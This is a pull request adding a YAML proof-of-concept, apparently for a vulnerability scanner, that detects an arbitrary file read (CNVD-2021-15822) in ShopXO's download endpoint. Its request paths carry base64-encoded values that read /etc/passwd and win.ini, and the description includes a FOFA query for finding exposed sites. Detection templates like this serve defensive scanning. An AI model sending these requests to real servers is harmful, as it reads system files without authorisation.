### PR TITLE
poc-yaml-shopxo-cnvd-2021-15822-fileread

### DIFF
--- a/pocs/poc-yaml-shopxo-cnvd-2021-15822-fileread.yml
+++ b/pocs/poc-yaml-shopxo-cnvd-2021-15822-fileread.yml
@@ -1,0 +1,23 @@
+name: poc-yaml-shopxo-cnvd-2021-15822-fileread
+manual: true
+transport: http
+rules:
+    sx0:
+        request:
+            cache: true
+            method: GET
+            path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
+        expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+    sx1:
+        request:
+            cache: true
+            method: GET
+            path: /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ==
+        expression: response.status == 200 && "; for 16-bit app support".bmatches(response.body)
+expression: sx0() || sx1()
+detail:
+    author: fengyang(https://github.com/bigDevi1)
+    links:
+        - https://github.com/MzzdToT/CNVD-2021-15822
+        - http://cn-sec.com/archives/389653.html
+    description: ShopXO download 任意文件读取漏洞


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
cnvd-2021-15822 ShopXO download 任意文件读取漏洞
## 测试环境
fofa：app="ShopXO企业级B2C电商系统提供商" 
## 备注
![image](https://user-images.githubusercontent.com/35722040/141255500-7da03889-f561-42b8-b3fa-72f900d85693.png)
